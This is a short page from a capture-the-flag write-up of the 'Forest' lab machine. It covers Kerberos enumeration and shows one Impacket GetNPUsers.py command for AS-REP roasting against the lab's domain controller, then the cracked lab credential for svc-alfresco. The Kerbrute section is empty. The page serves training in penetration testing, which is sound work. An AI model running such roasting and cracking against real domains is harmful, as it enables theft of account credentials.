🎫
Forest
  • Forest
    • Summary
  • Enumeration
    • TCP
    • UDP
    • Web Services
      • Nikto
      • Dirb Extensions
      • Dirsearch
      • goBuster
      • Robots
      • WhatWeb
    • Other Services
      • SMB
      • SMTP
      • MSRPC
      • Kerberos
  • Exploitation
  • Priv Escalation
  • Notes
Powered by GitBook
On this page
  • Kerbrute Enumeration
  • AESEProast
  1. Enumeration
  2. Other Services

Kerberos

PreviousMSRPCNextExploitation

Last updated 2 years ago

Kerbrute Enumeration

AESEProast

With the valid users that we got based on the RPC ENumeration we can potentially get TGTs for these users and crack them. 

python3 GetNPUsers.py  htb.local/ -dc-ip 10.10.10.161 -no-pass -request -usersfile /home/kali/Forest/results/10.10.10.161/userlist.txt

I ran the following command to try to get a TGT.

The user svc-alfresco had a TGT.

Cracking the TGT allowed me to get the following credentials.

svc-alfresco:s3rvice